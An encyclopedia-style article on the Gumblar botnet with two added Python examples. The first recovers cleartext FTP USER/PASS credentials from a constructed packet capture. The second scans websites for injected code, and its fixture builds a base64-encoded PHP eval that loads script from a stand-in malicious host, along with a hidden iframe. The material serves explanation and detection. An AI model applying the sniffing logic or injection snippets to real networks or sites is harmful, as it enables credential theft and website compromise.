Gumblar

Known as Gumblar by ScanSafe and Troj/JSRedir-R by Sophos, this botnet first appeared in 2009. It is characterized by redirecting users' Google searches and installing rogue security software.

Windows Personal Computers

Visitors to an infected site are redirected to an alternative site containing further malware; this was originally gumblar.cn but has since switched to a variety of domains. That site sends the visitor a malicious PDF, which is opened by the visitor's browser or by Acrobat Reader. The PDF then exploits a known, already disclosed vulnerability in Acrobat to gain access to the user's computer. Newer variants of Gumblar instead redirect users to sites serving fake antivirus software.

The virus locates FTP clients such as FileZilla and Dreamweaver and steals the credentials those clients store locally. It also enables promiscuous mode on the network card so that it can sniff local network traffic for FTP logins, which FTP transmits in cleartext on its control connection. It is one of the first viruses to incorporate an automated network sniffer.
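To make concrete what a sniffer on a promiscuous-mode NIC can recover from cleartext FTP, here is an added example that is not part of the original article and not Gumblar's own code. It pairs the USER and PASS commands seen on each client-to-server control connection (TCP port 21) to rebuild the credentials, and then shows the defender-side check that turns the same observation into an alert. The packet list, addresses, host names and passwords are all constructed for the example.

```python
"""
Added example: what an automated FTP sniffer sees on a shared network
segment, and the matching defender check. Not code from the original
article and not Gumblar's own code.

FTP sends USER and PASS in plaintext on the control connection, so any
host that can observe the traffic (a promiscuous-mode NIC on a hub or
a mirrored port, or the client's own machine) can pair the two commands
per connection and recover the login.
"""
import re
from dataclasses import dataclass

FTP_CONTROL_PORT = 21
# USER <name> / PASS <secret>; the argument may contain spaces.
CMD_RE = re.compile(r"^(USER|PASS)\s+(.+)$", re.IGNORECASE)


@dataclass(frozen=True)
class Packet:
    """Minimal view of a captured TCP segment (constructed for this example)."""
    src: str
    sport: int
    dst: str
    dport: int
    payload: str


# Constructed capture: two FTP logins, one HTTP request, one orphan PASS.
# Addresses are from the reserved documentation ranges.
SAMPLE_CAPTURE = [
    Packet("192.0.2.10", 50123, "198.51.100.5", 21, "USER webmaster\r\n"),
    Packet("198.51.100.5", 21, "192.0.2.10", 50123, "331 Please specify the password.\r\n"),
    Packet("192.0.2.10", 50123, "198.51.100.5", 21, "PASS s3cret-ftp!\r\n"),
    Packet("192.0.2.10", 50124, "203.0.113.9", 80, "GET / HTTP/1.1\r\nHost: example.invalid\r\n"),
    Packet("192.0.2.11", 50200, "198.51.100.7", 21, "USER deploy\r\n"),
    Packet("192.0.2.11", 50200, "198.51.100.7", 21, "PASS hunter2\r\n"),
    # A PASS with no preceding USER on the same connection is ignored.
    Packet("192.0.2.12", 50300, "198.51.100.8", 21, "PASS orphan\r\n"),
]


def extract_ftp_credentials(packets):
    """Pair USER/PASS per client connection (src, sport, dst).

    Only client->server traffic to the FTP control port is inspected;
    server replies and non-FTP traffic are skipped. Returns one dict per
    completed login attempt, in the order the PASS commands were seen.
    """
    pending = {}   # connection key -> username waiting for its PASS
    creds = []
    for p in packets:
        if p.dport != FTP_CONTROL_PORT:
            continue
        m = CMD_RE.match(p.payload.rstrip("\r\n"))
        if not m:
            continue
        cmd, arg = m.group(1).upper(), m.group(2)
        key = (p.src, p.sport, p.dst)
        if cmd == "USER":
            pending[key] = arg
        elif cmd == "PASS" and key in pending:
            creds.append({"server": p.dst, "client": p.src,
                          "user": pending.pop(key), "password": arg})
    return creds


def cleartext_ftp_alerts(packets):
    """Defender view: one alert line per cleartext FTP login observed.

    The alert deliberately omits the password; logging it would only
    create a second copy of the secret for an attacker to find.
    """
    return [f"cleartext FTP login from {c['client']} to {c['server']} as {c['user']}"
            for c in extract_ftp_credentials(packets)]


if __name__ == "__main__":
    for c in extract_ftp_credentials(SAMPLE_CAPTURE):
        print(f"{c['client']} -> {c['server']}: {c['user']} / {c['password']}")
    for line in cleartext_ftp_alerts(SAMPLE_CAPTURE):
        print(line)
```

The same pairing logic applied to SFTP or FTPS traffic recovers nothing, because the USER/PASS exchange is inside the encrypted channel; that is the practical reason to retire plain FTP for site uploads rather than only cleaning the infected client.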

Servers

Using the FTP credentials stolen from an infected client, the malware logs in to that user's website over FTP and infects it. It downloads large portions of the site, injects malicious code into the files, and uploads the modified files back to the server. The code is inserted into any file that contains an HTML tag, such as HTML, PHP, JavaScript, ASP and ASPX files. The inserted PHP code contains base64-encoded JavaScript that, once decoded and served to the browser, infects the computers of visitors who execute it. In addition, some pages have inline frames (iframes) inserted into them; typically the iframe code contains hidden links to malicious websites.

The virus also modifies .htaccess and HOSTS files, and creates images.php files in directories named 'images'.
The infection is not a server-wide exploit: it only infects sites on the server for which it holds passwords, so rotating every FTP credential that was stored on the infected client is part of the cleanup.
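The two paragraphs above describe what an infected site looks like on disk: PHP that evals base64-encoded JavaScript, hidden iframes, an images.php dropped into an 'images' directory, and a modified .htaccess. The following scanner is an added example, not code or signatures from the original article or from any vendor; it walks a document root and reports those generic indicators, decoding the base64 payload so an administrator can read what was injected. The sample file tree, its contents and the domains in it are constructed for the example and are not real indicators of compromise.

```python
"""
Added example: scan a web document root for the injection indicators
described in the section. Not code from the original article; the
patterns are generic heuristics for the technique, not Gumblar's
actual signatures.
"""
import base64
import os
import re
import tempfile
import time

# <?php eval(base64_decode('...')); ?>  -- the injected PHP carries its JavaScript base64-encoded
PHP_EVAL_B64_RE = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)\s*\)",
    re.IGNORECASE)
# iframes that are hidden or zero-sized are invisible to the visitor but still loaded
HIDDEN_IFRAME_RE = re.compile(
    r"<iframe[^>]*(?:display\s*:\s*none|visibility\s*:\s*hidden"
    r"|width\s*=\s*[\"']?0|height\s*=\s*[\"']?0)[^>]*>",
    re.IGNORECASE)
IFRAME_SRC_RE = re.compile(r"src\s*=\s*[\"']([^\"']+)", re.IGNORECASE)
WEB_EXTS = {".html", ".htm", ".php", ".js", ".asp", ".aspx"}

# Constructed payload used by build_sample_site(); the domain is made up.
INJECTED_JS = "document.write('<script src=\"http://malware.example/x.js\"></script>');"


def decode_b64_payload(blob):
    """Decode the blob inside eval(base64_decode('...')), tolerating line breaks."""
    return base64.b64decode(re.sub(r"\s+", "", blob)).decode("utf-8", errors="replace")


def scan_file(path, mtime_window_s):
    """Return a list of (indicator, detail) findings for one file."""
    findings = []
    name = os.path.basename(path)
    ext = os.path.splitext(name)[1].lower()
    if name == ".htaccess":
        # A config file touched recently on a site nobody edited deserves a look.
        if time.time() - os.path.getmtime(path) < mtime_window_s:
            findings.append(("htaccess-modified", path))
        return findings
    if name.lower() == "images.php" and os.path.basename(os.path.dirname(path)).lower() == "images":
        findings.append(("images-php-dropper", path))
    if ext not in WEB_EXTS:
        return findings
    with open(path, encoding="utf-8", errors="replace") as f:
        text = f.read()
    for m in PHP_EVAL_B64_RE.finditer(text):
        findings.append(("php-eval-base64", decode_b64_payload(m.group(1))))
    for m in HIDDEN_IFRAME_RE.finditer(text):
        src = IFRAME_SRC_RE.search(m.group(0))
        findings.append(("hidden-iframe", src.group(1) if src else m.group(0)))
    return findings


def scan_site(root, mtime_window_s=7 * 24 * 3600):
    """Walk a docroot; return {relative_path: [findings]} for files with any indicator."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            full = os.path.join(dirpath, fn)
            hits = scan_file(full, mtime_window_s)
            if hits:
                report[os.path.relpath(full, root).replace(os.sep, "/")] = hits
    return report


def build_sample_site():
    """Create a constructed docroot: a clean page, two injected pages, a dropper, an .htaccess."""
    root = tempfile.mkdtemp(prefix="gumblar-demo-")
    b64 = base64.b64encode(INJECTED_JS.encode()).decode()
    files = {
        "index.php": "<?php eval(base64_decode('" + b64 + "')); ?>\n<html><body>Hello</body></html>\n",
        "about.html": "<html><body><p>Clean page</p></body></html>\n",
        "news.html": ("<html><body><iframe src=\"http://bad.example/in.php\" width=\"0\" "
                      "height=\"0\" style=\"display:none\"></iframe></body></html>\n"),
        "images/images.php": "<?php /* constructed stand-in for a dropped file */ ?>\n",
        ".htaccess": "RewriteEngine On\n",
    }
    for rel, content in files.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as f:
            f.write(content)
    return root


if __name__ == "__main__":
    for rel, hits in sorted(scan_site(build_sample_site()).items()):
        for kind, detail in hits:
            print(f"{rel}: {kind}: {detail}")
```

Run it against a real document root with `scan_site("/var/www/html")`; the decoded payload is what to compare across sites, since the same injected JavaScript turning up on every site reachable with one client's stored FTP passwords is exactly the pattern the section describes.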

Gumblar variants

Different companies use different names for Gumblar and its variants. Initially the malware connected to the gumblar.cn domain, but that server was later shut down. Many badware variants have emerged since, connecting to various malicious servers via injected iframe code.

Gumblar resurfaced in January 2010, stealing FTP usernames and passwords and infecting HTML, PHP and JavaScript files on web servers to help spread itself, this time using multiple domains to make it harder to detect and stop.
The source of this article is wikipedia, the free encyclopedia.  The text of this article is licensed under the GFDL.